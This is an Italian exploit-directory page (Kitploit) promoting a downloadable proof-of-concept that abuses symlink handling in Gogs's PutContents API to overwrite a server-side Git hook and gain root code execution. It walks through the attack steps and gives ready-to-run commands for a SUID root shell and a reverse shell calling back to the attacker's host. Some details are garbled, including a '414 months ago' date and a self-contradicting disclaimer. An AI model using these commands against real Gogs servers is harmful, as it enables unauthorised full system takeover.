Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-81110-PoC — La gestione impropria dei collegamenti simbolici nell'API PutContents di Gogs consente l'esecuzione locale di codice. | Kitploit
Strumenti/GitHubGitHub/bridgeralderson/cve-2025-81110-poc
Escalation di PrivilegiAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed TeamingSviluppo Payload
GitHubbridgeralderson/cve-2025-81110-poc

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-81110-PoC

La gestione impropria dei collegamenti simbolici nell'API PutContents di Gogs consente l'esecuzione locale di codice.

Vedi Repository
414 mesi faNon ancora revisionato

CVE-2025-81110-PoC

Gestione impropria dei link simbolici nell'API PutContents di Gogs consente l'esecuzione locale di codice.

Questo repository contiene un exploit di livello professionale per una vulnerabilità critica in Gogs versioni precedenti alla 0.13.0. L'exploit sfrutta un difetto logico in cui l'API di Gogs non convalida i tipi di file durante l'aggiornamento dei contenuti del repository. Iniettando un link simbolico che punta a un hook Git lato server (pre-receive), un utente autenticato può sovrascrivere il contenuto dell'hook con uno script malevolo. Le successive operazioni di push Git attivano l'esecuzione di questo script nel contesto dell'utente che esegue il servizio Gogs (tipicamente root).

Iniezione del symlink: L'attaccante esegue il push di un link simbolico che punta agli hook interni del repository (es. /root/gogs-repositories//.git/hooks/pre-receive).

Sovrascrittura tramite API: L'API di Gogs consente di aggiornare il contenuto del link simbolico. Poiché il sistema operativo segue il link durante l'operazione di scrittura, l'hook Git interno viene sovrascritto.

RCE / Privilege Escalation: Un push Git successivo attiva l'hook pre-receive. Se Gogs è configurato con RUN_USER = root, l'attaccante ottiene il pieno controllo del sistema.

Requisiti

  • Python 3.x
  • libreria requests
  • strumento a riga di comando git installato sulla macchina dell'attaccante

UTILIZZO

Modalità SUID

root@kitploit:~
python3 exploit.py --url http://target:3000 --user <username> --pass <password> --mode suid

Al termine, ottieni accesso root sul target:

root@kitploit:~
/tmp/rootbash -p

REVSHELL

root@kitploit:~
python3 exploit.py --url http://target:3000 --user <username> --pass <password> --mode rev --lhost <your_ip> --lport 4444

Riferimento degli Argomenti

Disclaimer

Questo strumento è destinato esclusivamente a scopi educativi e ad audit di sicurezza autorizzati. L'autore non è responsabile per qualsiasi uso improprio o danno causato da questo strumento su sistemi di cui si è proprietari o per i quali si ha esplicita autorizzazione al test.

Scarica lo strumento
ArgomentoObbligatorioDescrizione
--urlSìL'URL base dell'istanza Gogs (es. http://127.0.0.1:3001).
--userSìNome utente valido per l'autenticazione.
--passSìPassword valida per l'utente specificato.
--modeNoModalità exploit: suid (crea /tmp/rootbash) o rev (reverse shell).
--lhostNoIndirizzo IP locale per il callback della reverse shell.
--lportNoPorta locale per l'ascoltatore della reverse shell.